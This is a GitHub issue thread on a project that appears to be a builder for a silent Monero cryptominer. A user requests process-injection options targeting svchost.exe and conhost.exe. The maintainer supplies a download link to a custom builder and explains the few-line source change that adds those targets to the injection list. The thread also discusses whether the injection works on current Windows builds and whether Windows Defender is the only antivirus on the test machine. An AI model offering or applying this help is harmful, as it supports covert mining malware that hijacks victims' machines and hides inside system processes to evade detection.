### ISSUE TITLE
can you make a version with old injeckt options like conhost & svchost

### ISSUE THREAD

**Issue by corsair550** [UnamSanctam/SilentXMRMiner#139]
title says everything think about it pls

**Comment by UnamSanctam** [comment]
Well I can but keep in mind that it doesn't work on new Windows versions.

**Comment by UnamSanctam** [comment]
[Silent XMR Miner Builder.zip](https://github.com/UnamSanctam/SilentXMRMiner/files/6251113/Silent.XMR.Miner.Builder.zip)
Here, as I said keep in mind that those injection options won't work on newer Windows versions.

**Comment by corsair550** [comment]
pls check out windows version on bottom right its a insider version build 21318 and it works well i also check it on 21h build 19043.899, it was also working very well. thank you for this custom version but can you also upload source codes pls?
![Capture](https://user-images.githubusercontent.com/66438050/113450727-1f8ec980-9409-11eb-8f74-58c0e0b0f2fd.PNG)

**Comment by UnamSanctam** [comment]
Well try it on a non-insider version and are you using anything other than Windows Defender? 

The changed source is like 3 rows, all you have to do it open up the project and add svchost.exe and conhost.exe to the 'Inject Into' combobox and you're done.
